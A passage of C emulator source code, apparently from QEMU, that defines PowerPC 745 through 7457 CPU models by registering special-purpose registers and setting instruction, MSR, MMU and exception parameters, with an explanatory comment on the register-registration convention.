SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_HID2, "HID2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Memory management */ gen_low_BATs(env); gen_high_BATs(env); gen_6xx_7xx_soft_tlb(env, 64, 2); init_excp_7x5(env); env->dcache_line_size = 32; env->icache_line_size = 32; /* Allocate hardware IRQ controller */ ppc6xx_irq_init(env_archcpu(env)); } POWERPC_FAMILY(745)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "PowerPC 745"; pcc->init_proc = init_proc_745; pcc->check_pow = check_pow_hid0; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_MFTB | PPC_FLOAT | PPC_FLOAT_FSEL | PPC_FLOAT_FRES | PPC_FLOAT_FRSQRTE | PPC_FLOAT_STFIWX | PPC_CACHE | PPC_CACHE_ICBI | PPC_CACHE_DCBZ | PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_MEM_TLBIE | PPC_MEM_TLBSYNC | PPC_6xx_TLB | PPC_SEGMENT | PPC_EXTERN; pcc->msr_mask = (1ull << MSR_POW) | (1ull << MSR_ILE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_SE) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_EP) | (1ull << MSR_IR) | (1ull << MSR_DR) | (1ull << MSR_PMM) | (1ull << MSR_RI) | (1ull << MSR_LE); pcc->mmu_model = POWERPC_MMU_SOFT_6xx; pcc->excp_model = POWERPC_EXCP_7x5; pcc->bus_model = PPC_FLAGS_INPUT_6xx; pcc->flags = POWERPC_FLAG_SE | POWERPC_FLAG_BE | POWERPC_FLAG_PMM | POWERPC_FLAG_BUS_CLK; } static void init_proc_755(CPUPPCState *env) { gen_spr_ne_601(env); gen_spr_sdr1(env); gen_spr_7xx(env); gen_spr_G2_755(env); /* Time base */ gen_tbl(env); /* L2 cache control */ /* XXX : not implemented */ spr_register(env, SPR_L2CR, "L2CR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, spr_access_nop, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_L2PMCR, "L2PMCR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Thermal management */ gen_spr_thrm(env); /* Hardware implementation registers */ /* XXX : not implemented */ spr_register(env, SPR_HID0, "HID0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_HID1, "HID1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_HID2, "HID2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Memory management */ gen_low_BATs(env); gen_high_BATs(env); gen_6xx_7xx_soft_tlb(env, 64, 2); init_excp_7x5(env); env->dcache_line_size = 32; env->icache_line_size = 32; /* Allocate hardware IRQ controller */ ppc6xx_irq_init(env_archcpu(env)); } POWERPC_FAMILY(755)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "PowerPC 755"; pcc->init_proc = init_proc_755; pcc->check_pow = check_pow_hid0; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_MFTB | PPC_FLOAT | PPC_FLOAT_FSEL | PPC_FLOAT_FRES | PPC_FLOAT_FRSQRTE | PPC_FLOAT_STFIWX | PPC_CACHE | PPC_CACHE_ICBI | PPC_CACHE_DCBZ | PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_MEM_TLBIE | PPC_MEM_TLBSYNC | PPC_6xx_TLB | PPC_SEGMENT | PPC_EXTERN; pcc->msr_mask = (1ull << MSR_POW) | (1ull << MSR_ILE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_SE) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_EP) | (1ull << MSR_IR) | (1ull << MSR_DR) | (1ull << MSR_PMM) | (1ull << MSR_RI) | (1ull << MSR_LE); pcc->mmu_model = 
POWERPC_MMU_SOFT_6xx; pcc->excp_model = POWERPC_EXCP_7x5; pcc->bus_model = PPC_FLAGS_INPUT_6xx; pcc->flags = POWERPC_FLAG_SE | POWERPC_FLAG_BE | POWERPC_FLAG_PMM | POWERPC_FLAG_BUS_CLK; } static void init_proc_7400(CPUPPCState *env) { gen_spr_ne_601(env); gen_spr_sdr1(env); gen_spr_7xx(env); /* Time base */ gen_tbl(env); /* 74xx specific SPR */ gen_spr_74xx(env); /* XXX : not implemented */ spr_register(env, SPR_UBAMR, "UBAMR", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); /* XXX: this seems not implemented on all revisions. */ /* XXX : not implemented */ spr_register(env, SPR_MSSCR1, "MSSCR1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Thermal management */ gen_spr_thrm(env); /* Memory management */ gen_low_BATs(env); init_excp_7400(env); env->dcache_line_size = 32; env->icache_line_size = 32; /* Allocate hardware IRQ controller */ ppc6xx_irq_init(env_archcpu(env)); } POWERPC_FAMILY(7400)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "PowerPC 7400 (aka G4)"; pcc->init_proc = init_proc_7400; pcc->check_pow = check_pow_hid0; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_MFTB | PPC_FLOAT | PPC_FLOAT_FSEL | PPC_FLOAT_FRES | PPC_FLOAT_FSQRT | PPC_FLOAT_FRSQRTE | PPC_FLOAT_STFIWX | PPC_CACHE | PPC_CACHE_ICBI | PPC_CACHE_DCBA | PPC_CACHE_DCBZ | PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_MEM_TLBIE | PPC_MEM_TLBSYNC | PPC_MEM_TLBIA | PPC_SEGMENT | PPC_EXTERN | PPC_ALTIVEC; pcc->msr_mask = (1ull << MSR_VR) | (1ull << MSR_POW) | (1ull << MSR_ILE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_SE) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_EP) | (1ull << MSR_IR) | (1ull << MSR_DR) | (1ull << MSR_PMM) | (1ull << MSR_RI) | (1ull << MSR_LE); pcc->mmu_model = POWERPC_MMU_32B; pcc->handle_mmu_fault = ppc_hash32_handle_mmu_fault; pcc->excp_model = POWERPC_EXCP_74xx; pcc->bus_model = PPC_FLAGS_INPUT_6xx; pcc->flags = POWERPC_FLAG_VRE | POWERPC_FLAG_SE | POWERPC_FLAG_BE | POWERPC_FLAG_PMM | POWERPC_FLAG_BUS_CLK; } static void init_proc_7410(CPUPPCState *env) { gen_spr_ne_601(env); gen_spr_sdr1(env); gen_spr_7xx(env); /* Time base */ gen_tbl(env); /* 74xx specific SPR */ gen_spr_74xx(env); /* XXX : not implemented */ spr_register(env, SPR_UBAMR, "UBAMR", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); /* Thermal management */ gen_spr_thrm(env); /* L2PMCR */ /* XXX : not implemented */ spr_register(env, SPR_L2PMCR, "L2PMCR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* LDSTDB */ /* XXX : not implemented */ spr_register(env, SPR_LDSTDB, "LDSTDB", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Memory management */ gen_low_BATs(env); init_excp_7400(env); env->dcache_line_size = 32; env->icache_line_size = 32; /* Allocate hardware IRQ controller */ ppc6xx_irq_init(env_archcpu(env)); } POWERPC_FAMILY(7410)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "PowerPC 7410 (aka G4)"; pcc->init_proc = init_proc_7410; pcc->check_pow = check_pow_hid0; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_MFTB | PPC_FLOAT | PPC_FLOAT_FSEL | PPC_FLOAT_FRES | PPC_FLOAT_FSQRT | PPC_FLOAT_FRSQRTE | PPC_FLOAT_STFIWX | PPC_CACHE | PPC_CACHE_ICBI | PPC_CACHE_DCBA | PPC_CACHE_DCBZ | PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_MEM_TLBIE | PPC_MEM_TLBSYNC | PPC_MEM_TLBIA | PPC_SEGMENT | PPC_EXTERN | PPC_ALTIVEC; pcc->msr_mask = 
(1ull << MSR_VR) | (1ull << MSR_POW) | (1ull << MSR_ILE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_SE) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_EP) | (1ull << MSR_IR) | (1ull << MSR_DR) | (1ull << MSR_PMM) | (1ull << MSR_RI) | (1ull << MSR_LE); pcc->mmu_model = POWERPC_MMU_32B; pcc->handle_mmu_fault = ppc_hash32_handle_mmu_fault; pcc->excp_model = POWERPC_EXCP_74xx; pcc->bus_model = PPC_FLAGS_INPUT_6xx; pcc->flags = POWERPC_FLAG_VRE | POWERPC_FLAG_SE | POWERPC_FLAG_BE | POWERPC_FLAG_PMM | POWERPC_FLAG_BUS_CLK; } static void init_proc_7440(CPUPPCState *env) { gen_spr_ne_601(env); gen_spr_sdr1(env); gen_spr_7xx(env); /* Time base */ gen_tbl(env); /* 74xx specific SPR */ gen_spr_74xx(env); /* XXX : not implemented */ spr_register(env, SPR_UBAMR, "UBAMR", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); /* LDSTCR */ /* XXX : not implemented */ spr_register(env, SPR_LDSTCR, "LDSTCR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* ICTRL */ /* XXX : not implemented */ spr_register(env, SPR_ICTRL, "ICTRL", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* MSSSR0 */ /* XXX : not implemented */ spr_register(env, SPR_MSSSR0, "MSSSR0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* PMC */ /* XXX : not implemented */ spr_register(env, SPR_7XX_PMC5, "PMC5", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_7XX_UPMC5, "UPMC5", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_7XX_PMC6, "PMC6", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_7XX_UPMC6, "UPMC6", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); /* Memory management */ gen_low_BATs(env); gen_74xx_soft_tlb(env, 128, 2); init_excp_7450(env); env->dcache_line_size = 32; env->icache_line_size = 32; /* Allocate hardware IRQ controller */ ppc6xx_irq_init(env_archcpu(env)); } POWERPC_FAMILY(7440)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "PowerPC 7440 (aka G4)"; pcc->init_proc = init_proc_7440; pcc->check_pow = check_pow_hid0_74xx; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_MFTB | PPC_FLOAT | PPC_FLOAT_FSEL | PPC_FLOAT_FRES | PPC_FLOAT_FSQRT | PPC_FLOAT_FRSQRTE | PPC_FLOAT_STFIWX | PPC_CACHE | PPC_CACHE_ICBI | PPC_CACHE_DCBA | PPC_CACHE_DCBZ | PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_MEM_TLBIE | PPC_MEM_TLBSYNC | PPC_MEM_TLBIA | PPC_74xx_TLB | PPC_SEGMENT | PPC_EXTERN | PPC_ALTIVEC; pcc->msr_mask = (1ull << MSR_VR) | (1ull << MSR_POW) | (1ull << MSR_ILE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_SE) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_EP) | (1ull << MSR_IR) | (1ull << MSR_DR) | (1ull << MSR_PMM) | (1ull << MSR_RI) | (1ull << MSR_LE); pcc->mmu_model = POWERPC_MMU_SOFT_74xx; pcc->excp_model = POWERPC_EXCP_74xx; pcc->bus_model = PPC_FLAGS_INPUT_6xx; pcc->flags = POWERPC_FLAG_VRE | POWERPC_FLAG_SE | POWERPC_FLAG_BE | POWERPC_FLAG_PMM | POWERPC_FLAG_BUS_CLK; } static void init_proc_7450(CPUPPCState *env) { gen_spr_ne_601(env); gen_spr_sdr1(env); gen_spr_7xx(env); /* Time base */ gen_tbl(env); /* 74xx specific SPR */ gen_spr_74xx(env); /* Level 3 cache 
control */ gen_l3_ctrl(env); /* L3ITCR1 */ /* XXX : not implemented */ spr_register(env, SPR_L3ITCR1, "L3ITCR1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* L3ITCR2 */ /* XXX : not implemented */ spr_register(env, SPR_L3ITCR2, "L3ITCR2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* L3ITCR3 */ /* XXX : not implemented */ spr_register(env, SPR_L3ITCR3, "L3ITCR3", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* L3OHCR */ /* XXX : not implemented */ spr_register(env, SPR_L3OHCR, "L3OHCR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_UBAMR, "UBAMR", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); /* LDSTCR */ /* XXX : not implemented */ spr_register(env, SPR_LDSTCR, "LDSTCR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* ICTRL */ /* XXX : not implemented */ spr_register(env, SPR_ICTRL, "ICTRL", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* MSSSR0 */ /* XXX : not implemented */ spr_register(env, SPR_MSSSR0, "MSSSR0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* PMC */ /* XXX : not implemented */ spr_register(env, SPR_7XX_PMC5, "PMC5", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_7XX_UPMC5, "UPMC5", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_7XX_PMC6, "PMC6", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_7XX_UPMC6, "UPMC6", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); /* Memory management */ gen_low_BATs(env); gen_74xx_soft_tlb(env, 128, 2); init_excp_7450(env); env->dcache_line_size = 32; env->icache_line_size = 32; /* Allocate hardware IRQ controller */ ppc6xx_irq_init(env_archcpu(env)); } POWERPC_FAMILY(7450)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "PowerPC 7450 (aka G4)"; pcc->init_proc = init_proc_7450; pcc->check_pow = check_pow_hid0_74xx; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_MFTB | PPC_FLOAT | PPC_FLOAT_FSEL | PPC_FLOAT_FRES | PPC_FLOAT_FSQRT | PPC_FLOAT_FRSQRTE | PPC_FLOAT_STFIWX | PPC_CACHE | PPC_CACHE_ICBI | PPC_CACHE_DCBA | PPC_CACHE_DCBZ | PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_MEM_TLBIE | PPC_MEM_TLBSYNC | PPC_MEM_TLBIA | PPC_74xx_TLB | PPC_SEGMENT | PPC_EXTERN | PPC_ALTIVEC; pcc->msr_mask = (1ull << MSR_VR) | (1ull << MSR_POW) | (1ull << MSR_ILE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_SE) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_EP) | (1ull << MSR_IR) | (1ull << MSR_DR) | (1ull << MSR_PMM) | (1ull << MSR_RI) | (1ull << MSR_LE); pcc->mmu_model = POWERPC_MMU_SOFT_74xx; pcc->excp_model = POWERPC_EXCP_74xx; pcc->bus_model = PPC_FLAGS_INPUT_6xx; pcc->flags = POWERPC_FLAG_VRE | POWERPC_FLAG_SE | POWERPC_FLAG_BE | POWERPC_FLAG_PMM | POWERPC_FLAG_BUS_CLK; } static void init_proc_7445(CPUPPCState *env) { gen_spr_ne_601(env); gen_spr_sdr1(env); gen_spr_7xx(env); /* Time base */ gen_tbl(env); /* 74xx specific SPR */ gen_spr_74xx(env); /* LDSTCR */ /* XXX : not implemented */ spr_register(env, SPR_LDSTCR, "LDSTCR", SPR_NOACCESS, SPR_NOACCESS, 
&spr_read_generic, &spr_write_generic, 0x00000000); /* ICTRL */ /* XXX : not implemented */ spr_register(env, SPR_ICTRL, "ICTRL", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* MSSSR0 */ /* XXX : not implemented */ spr_register(env, SPR_MSSSR0, "MSSSR0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* PMC */ /* XXX : not implemented */ spr_register(env, SPR_7XX_PMC5, "PMC5", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_7XX_UPMC5, "UPMC5", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_7XX_PMC6, "PMC6", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_7XX_UPMC6, "UPMC6", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); /* SPRGs */ spr_register(env, SPR_SPRG4, "SPRG4", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_USPRG4, "USPRG4", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); spr_register(env, SPR_SPRG5, "SPRG5", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_USPRG5, "USPRG5", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); spr_register(env, SPR_SPRG6, "SPRG6", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_USPRG6, "USPRG6", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); spr_register(env, SPR_SPRG7, "SPRG7", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_USPRG7, "USPRG7", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); /* Memory management */ gen_low_BATs(env); gen_high_BATs(env); gen_74xx_soft_tlb(env, 128, 2); init_excp_7450(env); env->dcache_line_size = 32; env->icache_line_size = 32; /* Allocate hardware IRQ controller */ ppc6xx_irq_init(env_archcpu(env)); } POWERPC_FAMILY(7445)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "PowerPC 7445 (aka G4)"; pcc->init_proc = init_proc_7445; pcc->check_pow = check_pow_hid0_74xx; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_MFTB | PPC_FLOAT | PPC_FLOAT_FSEL | PPC_FLOAT_FRES | PPC_FLOAT_FSQRT | PPC_FLOAT_FRSQRTE | PPC_FLOAT_STFIWX | PPC_CACHE | PPC_CACHE_ICBI | PPC_CACHE_DCBA | PPC_CACHE_DCBZ | PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_MEM_TLBIE | PPC_MEM_TLBSYNC | PPC_MEM_TLBIA | PPC_74xx_TLB | PPC_SEGMENT | PPC_EXTERN | PPC_ALTIVEC; pcc->msr_mask = (1ull << MSR_VR) | (1ull << MSR_POW) | (1ull << MSR_ILE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_SE) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_EP) | (1ull << MSR_IR) | (1ull << MSR_DR) | (1ull << MSR_PMM) | (1ull << MSR_RI) | (1ull << MSR_LE); pcc->mmu_model = POWERPC_MMU_SOFT_74xx; pcc->excp_model = POWERPC_EXCP_74xx; pcc->bus_model = PPC_FLAGS_INPUT_6xx; pcc->flags = POWERPC_FLAG_VRE | POWERPC_FLAG_SE | POWERPC_FLAG_BE | POWERPC_FLAG_PMM | POWERPC_FLAG_BUS_CLK; } static void init_proc_7455(CPUPPCState *env) { gen_spr_ne_601(env); gen_spr_sdr1(env); gen_spr_7xx(env); /* Time base */ gen_tbl(env); /* 74xx specific SPR */ gen_spr_74xx(env); /* Level 3 cache control */ gen_l3_ctrl(env); /* LDSTCR */ /* XXX : not implemented */ 
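/*
 * Editor's note on the spr_register() convention used throughout this
 * file: each call wires one special-purpose register into the model.
 * Reading the arguments in order: SPR number, printable name, the
 * user-mode (problem state) read/write callbacks, the supervisor-mode
 * read/write callbacks, and the register's reset value.  SPR_NOACCESS
 * in a slot means the access traps; &spr_read_ureg is the common
 * "user-level alias of a privileged SPR" reader.  A minimal sketch of
 * what the generic callback pair amounts to at run time (plain C, not
 * part of the build; the function names here are illustrative only):
 *
 *   static uint64_t my_spr_read_generic(CPUPPCState *env, int sprn)
 *   {
 *       return env->spr[sprn];            // fetch the backing slot
 *   }
 *
 *   static void my_spr_write_generic(CPUPPCState *env, int sprn,
 *                                    uint64_t val)
 *   {
 *       env->spr[sprn] = val;             // store the backing slot
 *   }
 *
 * The real callbacks emit TCG ops at translation time rather than
 * running directly, but the effect on env->spr[] is the same.
 */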
spr_register(env, SPR_LDSTCR, "LDSTCR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* ICTRL */ /* XXX : not implemented */ spr_register(env, SPR_ICTRL, "ICTRL", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* MSSSR0 */ /* XXX : not implemented */ spr_register(env, SPR_MSSSR0, "MSSSR0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* PMC */ /* XXX : not implemented */ spr_register(env, SPR_7XX_PMC5, "PMC5", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_7XX_UPMC5, "UPMC5", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_7XX_PMC6, "PMC6", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_7XX_UPMC6, "UPMC6", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); /* SPRGs */ spr_register(env, SPR_SPRG4, "SPRG4", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_USPRG4, "USPRG4", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); spr_register(env, SPR_SPRG5, "SPRG5", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_USPRG5, "USPRG5", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); spr_register(env, SPR_SPRG6, "SPRG6", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_USPRG6, "USPRG6", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); spr_register(env, SPR_SPRG7, "SPRG7", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_USPRG7, "USPRG7", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); /* Memory management */ gen_low_BATs(env); gen_high_BATs(env); gen_74xx_soft_tlb(env, 128, 2); init_excp_7450(env); env->dcache_line_size = 32; env->icache_line_size = 32; /* Allocate hardware IRQ controller */ ppc6xx_irq_init(env_archcpu(env)); } POWERPC_FAMILY(7455)(CPUClass *oc, void *data) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); // dc->desc = "PowerPC 7455 (aka G4)"; pcc->init_proc = init_proc_7455; pcc->check_pow = check_pow_hid0_74xx; pcc->insns_flags = PPC_INSNS_BASE | PPC_STRING | PPC_MFTB | PPC_FLOAT | PPC_FLOAT_FSEL | PPC_FLOAT_FRES | PPC_FLOAT_FSQRT | PPC_FLOAT_FRSQRTE | PPC_FLOAT_STFIWX | PPC_CACHE | PPC_CACHE_ICBI | PPC_CACHE_DCBA | PPC_CACHE_DCBZ | PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_MEM_TLBIE | PPC_MEM_TLBSYNC | PPC_MEM_TLBIA | PPC_74xx_TLB | PPC_SEGMENT | PPC_EXTERN | PPC_ALTIVEC; pcc->msr_mask = (1ull << MSR_VR) | (1ull << MSR_POW) | (1ull << MSR_ILE) | (1ull << MSR_EE) | (1ull << MSR_PR) | (1ull << MSR_FP) | (1ull << MSR_ME) | (1ull << MSR_FE0) | (1ull << MSR_SE) | (1ull << MSR_DE) | (1ull << MSR_FE1) | (1ull << MSR_EP) | (1ull << MSR_IR) | (1ull << MSR_DR) | (1ull << MSR_PMM) | (1ull << MSR_RI) | (1ull << MSR_LE); pcc->mmu_model = POWERPC_MMU_SOFT_74xx; pcc->excp_model = POWERPC_EXCP_74xx; pcc->bus_model = PPC_FLAGS_INPUT_6xx; pcc->flags = POWERPC_FLAG_VRE | POWERPC_FLAG_SE | POWERPC_FLAG_BE | POWERPC_FLAG_PMM | POWERPC_FLAG_BUS_CLK; } #if 0 static void init_proc_7457(CPUPPCState *env) { gen_spr_ne_601(env); gen_spr_sdr1(env); gen_spr_7xx(env); /* Time base */ gen_tbl(env); /* 74xx specific SPR */ gen_spr_74xx(env); /* Level 3 cache 
control */ gen_l3_ctrl(env); /* L3ITCR1 */ /* XXX : not implemented */ spr_register(env, SPR_L3ITCR1, "L3ITCR1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* L3ITCR2 */ /* XXX : not implemented */ spr_register(env, SPR_L3ITCR2, "L3ITCR2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* L3ITCR3 */ /* XXX : not implemented */ spr_register(env, SPR_L3ITCR3, "L3ITCR3", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* L3OHCR */ /* XXX : not implemented */ spr_register(env, SPR_L3OHCR, "L3OHCR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* LDSTCR */ /* XXX : not implemented */ spr_register(env, SPR_LDSTCR, "LDSTCR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* ICTRL */ /* XXX : not implemented */ spr_register(env, SPR_ICTRL, "ICTRL", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* MSSSR0 */ /* XXX : not implemented */ spr_register(env, SPR_MSSSR0, "MSSSR0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* PMC */ /* XXX : not implemented */ spr_register(env, SPR_7XX_PMC5, "PMC5", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_7XX_UPMC5, "UPMC5", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_7XX_PMC6, "PMC6", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_7XX_UPMC6, 